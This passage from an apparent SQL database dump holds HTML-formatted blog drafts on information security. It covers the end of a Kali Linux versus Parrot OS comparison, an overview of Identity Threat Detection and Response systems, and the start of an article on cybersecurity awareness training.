dir=\"ltr\">Which One Should You Choose?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The right choice between Kali Linux and Parrot OS boils down to your specific needs:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Choose Kali Linux if</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">You’re a cybersecurity professional or seasoned ethical hacker.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Offensive security and vulnerability assessment are your primary 
focus.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">You need a wide range of specialized tools pre-installed and ready to go.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\"><b><strong class=\"font-bold\">Choose Parrot OS if</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"6\">You’re a beginner or intermediate cybersecurity enthusiast.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"7\">You value <b><strong class=\"font-bold\">privacy online</strong></b> and frequently engage in secure communication.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"8\">You prefer a lightweight, versatile OS that works smoothly on low-spec hardware.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">If you’re still not sure which OS would suit your requirements better, consider testing both on a virtual machine. Experimenting hands-on will give you a practical understanding of their interfaces, compatibility, and features.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Future of Cybersecurity Tools</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">With the rapid pace of technological innovations, tools like Kali Linux and Parrot OS will only evolve. 
Both operating systems will likely integrate emerging features to reflect future <b><strong class=\"font-bold\">cybersecurity trends 2025</strong></b>, like AI-driven threat detection and dynamic vulnerability testing. Staying updated with these platforms ensures you’re equipped to tackle the complexities of the cybersecurity landscape head-on.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Both Kali Linux and Parrot OS are excellent operating systems that serve the cybersecurity community in different ways. Whether you prioritize extensive tools for penetration testing or seek a balanced platform with privacy features, there’s an OS tailored to your tasks.</p>', '', NULL, NULL, 1, 'draft', '2025-01-23 19:33:07', '2026-01-12 21:41:44', 'Information Security', 'Which is Better for You? A Detailed Comparison of Kali Linux vs. Parrot OS', '', NULL),
(62, 'Unlocking Identity Threat Detection and Response in Cybersecurity', 'unlocking-identity-threat-detection-and-response-in-cybersecurity', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">With the growing prevalence of credential-based cyberattacks, protecting digital identities has become a critical priority for businesses. It’s far easier for attackers to exploit credentials, such as passwords, than to breach highly fortified systems. For organizations, safeguarding and monitoring access within their Identity and Access Management (IAM) frameworks has never been more essential. This article dives into the implementation of Identity Threat Detection and Response (ITDR) systems, offering a unified approach to prevention, detection, and response, and taking cybersecurity beyond just prevention methodologies.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why is Identity Threat Detection Crucial?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">User credentials, such as usernames and passwords, are among the most frequent targets for cyber attackers. They often provide direct access to critical systems and sensitive data, making them one of the biggest vulnerabilities in modern security landscapes. Reports show that many data breaches originate from stolen, compromised, or misused credentials, making credential security a pressing challenge.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">IAM, or Identity and Access Management, is the framework businesses use to control and secure access to resources. Traditionally, IAM has focused on preventive measures like multi-factor authentication (MFA) and role-based access control (RBAC). 
While these methods are essential, they fail to address the gaps around detecting and responding to credential misuse. This is where ITDR systems step in to bridge the gap, combining IAM with Security Information and Event Management (SIEM) systems for a holistic security approach.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">What Are ITDR Systems?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Identity Threat Detection and Response (ITDR) systems are cybersecurity platforms that combine identity management and security monitoring to tackle credential-related risks. Unlike traditional preventive tools, ITDR delivers robust measures for threat detection and response. ITDR systems operate across three key phases:</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Collect</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Detect</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Respond</strong></b></li>\r\n</ol>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Collection Phase</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The foundation of ITDR systems begins with precise data collection. 
These systems gather valuable insights from various sources, including:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Identity Providers (IDPs):</strong></b> These platforms are responsible for user authentication processes and often enable Single Sign-On (SSO) capabilities. They provide key insights into user behavior, such as access patterns and failed authentication attempts.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Directories:</strong></b> Directories store vital information, such as usernames, hashed passwords, and user roles. Common examples include systems utilizing Lightweight Directory Access Protocol (LDAP) or Microsoft Active Directory.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Network Flow Data:</strong></b> Capturing network activity provides additional context to log files. 
Unlike logs that could be tampered with, network flow data ensures added visibility across organizational traffic.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Firewall and Security Logs:</strong></b> These logs track access attempts to sensitive resources, helping identify possible intrusions or unauthorized access attempts.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\"><b><strong class=\"font-bold\">SIEM Systems:</strong></b> Security Information and Event Management systems aggregate and analyze security data from multiple sources, providing comprehensive insights into security events.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By consolidating data from these sources, ITDR systems offer a centralized and holistic view of identity activity across an enterprise, enabling organizations to monitor patterns and detect anomalies effectively. These insights are often presented through customizable dashboards, providing actionable intelligence about risky behaviors and suspicious accounts.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Detection Phase</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">ITDR systems excel at detecting anomalies and identifying patterns that traditional tools might overlook. Unlike traditional SIEM tools that focus on events that <i><em class=\"italic\">did happen</em></i> (e.g., a login attempt), ITDR systems can recognize activities that <i><em class=\"italic\">should have happened</em></i> but didn’t. 
For example:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">A user logs in but skips the expected MFA step.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">An internal user accesses sensitive applications without proper authentication.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">ITDR systems employ advanced techniques, such as state diagrams, to map expected workflows and identify deviations. For instance:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Internal users should access general applications after appropriate authentication.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">External users should log in via a VPN (Virtual Private Network), complete MFA, and then access sensitive applications.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Deviations from these expected workflows raise red flags and trigger alerts for further investigation.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Response Phase</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">When ITDR systems detect a threat, they immediately initiate response actions to minimize damage and prevent escalation. 
Common response actions include:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Account Lockouts:</strong></b> Temporarily suspending accounts to prevent further unauthorized use.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Access Privilege Adjustments:</strong></b> Restricting privileges based on suspicious activity, following the principle of least privilege.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Incident Reporting:</strong></b> Logging incidents and notifying security teams with actionable insights and recommendations for resolution.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By integrating ITDR systems with broader SIEM platforms, organizations enable real-time communication between systems, enhancing the effectiveness of both detection and response.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">What Can ITDR Systems Detect?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Identity Threat Detection and Response systems identify complex and subtle threats that traditional tools often miss. 
For example:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Weak Authentication Loopholes:</strong></b> Spotting users bypassing MFA or using outdated authentication methods.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Risky Privileged Access:</strong></b> Detecting unauthorized attempts to access high-privilege accounts like admin or root accounts.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Anomalous Access Patterns:</strong></b> Identifying unusual user behavior, such as repeated access from external IPs or attempts to access applications unrelated to a user’s role.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Benefits of ITDR Systems</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Adding ITDR systems to a cybersecurity strategy offers significant advantages, including:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Enhanced Identity Protection:</strong></b> By monitoring user activity across multiple sources, ITDR systems minimize the risk of credential misuse and insider threats.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] 
my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Improved Detection of Advanced Threats:</strong></b> ITDR addresses the gaps in traditional IAM tools by providing greater visibility into sophisticated attack strategies, such as lateral movement or advanced phishing attacks.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Efficient Incident Response:</strong></b> Automated responses enable organizations to react to threats swiftly, reducing the time taken to contain and neutralize breaches.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Considerations for Implementing ITDR</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">To maximize the benefits of ITDR, businesses should consider:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">System Compatibility:</strong></b> Ensure the ITDR platform integrates seamlessly with existing IAM, security, and IT infrastructure.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Employee Training:</strong></b> Equip IT teams with the knowledge to interpret ITDR outputs and respond effectively.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong 
class=\"font-bold\">Ongoing Monitoring and Upgrades:</strong></b> Regularly update ITDR systems to stay ahead of evolving threats and maintain optimal performance.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Future of ITDR Systems</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">With attackers adopting increasingly sophisticated credential-based strategies, the future of ITDR will involve more advanced technologies like AI-powered threat analytics. These systems will predict potential vulnerabilities using historical data and automate responses with greater precision. ITDR solutions are expected to evolve beyond detection and response, offering predictive capabilities as part of their core functionality.</p>', '', NULL, NULL, 1, 'draft', '2025-01-23 19:22:24', '2026-01-12 21:41:44', 'Information Security', 'Unlocking Identity Threat Detection and Response in Cybersecurity', '', NULL),
(63, 'The Importance of Cybersecurity Awareness Training', 'the-importance-of-cybersecurity-awareness-training', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity threats are becoming more sophisticated, diverse, and frequent. With the rise of cybercrime—from phishing emails to ransomware attacks—organizations of all sizes must equip their teams with the knowledge and tools to combat these dangers. Cybersecurity awareness training has rapidly emerged as a critical line of defense against cyber threats, empowering employees to identify and mitigate potential risks.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This blog explores why such training is essential, how it addresses current cybersecurity trends, and the steps IT professionals and businesses can take to implement effective programs.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Cybersecurity Trends and the Growing Need for Training</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The world of cybercrime evolves daily. Hackers exploit everything from outdated systems to human error to gain unauthorized access. 
Some critical trends driving the need for cybersecurity awareness training include:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Phishing Attacks</strong></b>: Cybercriminals are getting better at crafting believable phishing emails, targeting employees to reveal sensitive data.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Ransomware</strong></b>: Many businesses have fallen victim to ransomware, where hackers encrypt critical data and demand payment for its release.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Remote Work Risks</strong></b>: The shift to remote work, while convenient, opens more weak points in security systems. Employees using unsecured devices can expose organizations to attacks.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The rapidly changing nature of these threats highlights the importance of equipping employees with the awareness to recognize potential dangers and respond appropriately.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Identifying Cybersecurity Risks in Small Businesses</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Small businesses may believe they are too small to be targeted, but they are often seen as easy marks by cybercriminals. 
Common vulnerabilities for small companies include:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Lack of a dedicated IT team or security plan.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Employees with little to no cybersecurity training.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Outdated software and technology.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\"></p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Unfortunately, a single incident could lead to significant financial and reputational damage. Training employees to recognize risks—such as identifying suspicious emails or securing sensitive data—offers small businesses a fighting chance against cybercriminals.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Role of IT Professionals in Implementing Training</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">IT professionals play a crucial role in protecting organizations from cyber threats and in implementing cybersecurity awareness training. 
Their responsibilities include:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Assessing threats</strong></b> unique to the company’s industry and operating systems.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Designing training programs</strong></b> tailored to employees\' roles and technical expertise.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Educating employees</strong></b> on key security practices, such as creating strong passwords, identifying phishing attempts, and reporting irregularities.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By collaborating with leadership, IT professionals ensure that cybersecurity becomes an organizational priority.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Creating a Cybersecurity Training Plan</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Planning a comprehensive cybersecurity awareness program ensures consistency and effectiveness. 
Here’s how organizations can structure their training plans:</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Assess Current Knowledge</strong></b>: Begin by identifying gaps in employees’ cybersecurity knowledge through surveys or assessments.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Define Goals</strong></b>: Outline clear objectives for the training. What skills or practices should employees master?</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Integrate Real-life Scenarios</strong></b>: Use case studies or simulations to show employees how cyberattacks play out and what measures to take.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Update Regularly</strong></b>: Cybersecurity is always changing. 
Schedule regular reviews and updates to incorporate the latest risks and trends.</li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Making cybersecurity training engaging and accessible ensures employees retain and apply their knowledge.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Implementing Incident Response Strategies</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Even the best training cannot prevent every cyberattack. That’s why incident response strategies are an essential component of cybersecurity planning. A strong response plan ensures that businesses can take quick, effective action during a cyberattack to minimize damages.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Training employees in incident response includes:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Teaching clear protocols</strong></b> for reporting suspicious activity or breaches.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Training employees on their role—whether it’s isolating affected systems, securing critical data, or notifying leadership.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" 